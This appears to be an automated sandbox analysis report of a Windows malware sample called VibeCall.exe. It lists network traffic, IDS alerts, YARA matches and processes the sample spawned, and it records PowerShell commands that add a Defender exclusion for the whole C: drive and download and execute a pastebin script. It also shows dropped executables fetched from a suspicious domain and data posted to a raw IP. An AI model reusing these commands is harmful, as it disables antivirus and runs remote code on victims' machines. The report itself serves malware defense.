                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewJA3 fingerprint: 19ed67d089455ee39586e1a3ffdf82ba
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: C:\Users\user\Desktop\VibeCall.exeDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59320 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59322 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59323 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59324 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59325 -> 208.95.112.1:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59340 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59356 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59387 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59450 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 98.142.253.232:9364 -> 192.168.2.4:59636
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 104.20.4.235:443
                      Source: global trafficHTTP traffic detected: GET /raw/ySSytGm5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 35Content-Type: application/dns-message
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: rustaisolutionnorisk.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: api.help-asus.com
                      Source: unknownDoH DNS queries detected: name: api.help-asus.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 35Content-Type: application/dns-message
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                      Source: VibeCall.exe, 00000000.00000003.1754048266.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754430639.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754370535.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754181293.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1753814276.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000002.00000002.1940483304.00000210A13B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65CD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B74466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B745A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B659C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B643F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: VibeCall.exe, 00000000.00000003.1768587243.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: VibeCall.exe, 00000000.00000003.1782887606.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: VibeCall.exe, 00000000.00000003.1783882518.0000030A56D33000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1783695587.0000030A56D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VibeCall.exe, 00000000.00000003.1783695587.0000030A56D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm8=
                      Source: powershell.exe, 0000000C.00000002.2278452607.000001A65A612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: VibeCall.exe, 00000000.00000003.1751848067.0000030A56D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VibeCall.exe, 00000000.00000003.1767276726.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VibeCall.exe, 00000000.00000003.1767230616.0000030A56D69000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767155938.0000030A56D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comR
                      Source: VibeCall.exe, 00000000.00000003.1767904702.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767982858.0000030A56D47000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767792346.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comdd
                      Source: fontdrvhost.exe	String found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet/downloadCommon
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet/info
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/dotnet/sdk-not-found
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B643F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
                      Source: fontdrvhost.exe	String found in binary or memory: https://api.help-asus.com:5101/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
                      Source: VibeCall.exe, 00000000.00000003.1752763950.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752677795.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752848956.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.mic
                      Source: VibeCall.exe, 00000000.00000003.1752763950.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752677795.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752848956.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.microso
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B65093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000002.00000002.1940483304.00000210A13B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65CD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B74466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B745A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B65732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000004.00000002.1928519656.0000020B62A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932155541.0000020B62C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ySSytGm5
                      Source: powershell.exe, 00000004.00000002.1932155541.0000020B62C45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/yssytgm5
                      Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59621
                      Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknown	Network traffic detected: HTTP traffic on port 59621 -> 443
                      Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknown	HTTPS traffic detected: 104.16.248.249:443 -> 192.168.2.4:59621 version: TLS 1.2
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DirectInput8Creatememstr_1e00ee70-9
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: GetRawInputDatamemstr_6b6b2405-e
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.4df0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.5010000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 16.3.contry_solution_vibecall_e.exe.36b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 32.3.fontdrvhost.exe.5690000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 44.3.OpenWith.exe.5010000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 15.3.aisolution_vibecall_a.exe.39d0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.4df0000.6.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.5010000.7.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 44.3.OpenWith.exe.4df0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 32.3.fontdrvhost.exe.5690000.7.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 26.3.fontdrvhost.exe.5550000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 15.3.aisolution_vibecall_a.exe.37b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.4df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 16.3.contry_solution_vibecall_e.exe.3490000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 32.3.fontdrvhost.exe.5470000.6.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 26.3.fontdrvhost.exe.5770000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 32.3.fontdrvhost.exe.5470000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 32.3.fontdrvhost.exe.5470000.0.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 26.3.fontdrvhost.exe.5550000.6.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 16.3.contry_solution_vibecall_e.exe.36b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 17.3.soundsolution_vibecall_c.exe.4df0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 26.3.fontdrvhost.exe.5550000.0.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 00000011.00000003.2761352961.0000000005010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000001A.00000003.2635389333.0000000005550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000020.00000003.2673636720.0000000005470000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000020.00000003.2674081436.0000000005690000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000011.00000003.2760852236.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000010.00000003.2663175425.00000000036B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000002C.00000003.2769896802.0000000005010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000002C.00000003.2769207623.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000001A.00000003.2635666692.0000000005770000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000010.00000003.2662989095.0000000003490000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match	File source: Process Memory Space: aisolution_vibecall_a.exe PID: 5936, type: MEMORYSTR
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_00000228E99215C0 NtAcceptConnectPort, 37_2_00000228E99215C0
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_00000228E9921CF4 NtAcceptConnectPort,CloseHandle, 37_2_00000228E9921CF4
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_00000228E9921AA4 NtAcceptConnectPort,NtAcceptConnectPort, 37_2_00000228E9921AA4
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_00000228E9920AC8 NtAcceptConnectPort,NtAcceptConnectPort, 37_2_00000228E9920AC8
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 43_2_000001C328260AC8 NtAcceptConnectPort,NtAcceptConnectPort, 43_2_000001C328260AC8
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 43_2_000001C328261AA4 NtAcceptConnectPort,NtAcceptConnectPort, 43_2_000001C328261AA4
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 43_2_000001C328261CF4 NtAcceptConnectPort,CloseHandle, 43_2_000001C328261CF4
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 43_2_000001C3282615C0 NtAcceptConnectPort, 43_2_000001C3282615C0
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_01431170 15_3_01431170
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_0142F13B 15_3_0142F13B
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_0143CC25 15_3_0143CC25
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_0142C09A 15_3_0142C09A
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_0142C3DC 15_3_0142C3DC
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_01436F89 15_3_01436F89
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: 15_3_0143264D 15_3_0143264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_0063CC25 16_3_0063CC25
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_0062C09A 16_3_0062C09A
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_00631170 16_3_00631170
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_0062F13B 16_3_0062F13B
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_0063264D 16_3_0063264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_0062C3DC 16_3_0062C3DC
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: 16_3_00636F89 16_3_00636F89
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe	Code function: 17_3_01780BC1 17_3_01780BC1
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 37_2_00000228E9920C70 37_2_00000228E9920C70
                      Source: C:\Windows\System32\fontdrvhost.exe	Code function: 43_2_000001C328260C70 43_2_000001C328260C70
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Code function: String function: 00627FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Code function: String function: 01427FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624
                      Source: VibeCall.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.dr	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.dr	Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: aisolution_vibecall_a.exe.0.dr	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.dr	Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.dr	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: contry_solution_vibecall_e.exe.0.dr	Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: soundsolution_vibecall_c.exe.0.dr	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.dr	Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
                      Source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
                      Source: classification engine	Classification label: mal84.troj.evad.winEXE@36/25@7/9
                      Source: C:\Users\user\Desktop\VibeCall.exe	File created: C:\Users\user\aisolution_vibecall_a.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-372783b-5f8a-e1640a-0a199f94217d}
                      Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4e5bfc57-9dd8-f68e5-2d765d85c0d6}
                      Source: C:\Windows\SysWOW64\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2892
                      Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8116
                      Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                      Source: C:\Users\user\Desktop\VibeCall.exe	File created: C:\Users\user\AppData\Local\Temp\ynnjwwvy.hvh
                      Source: C:\Users\user\Desktop\VibeCall.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown	Process created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 652
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
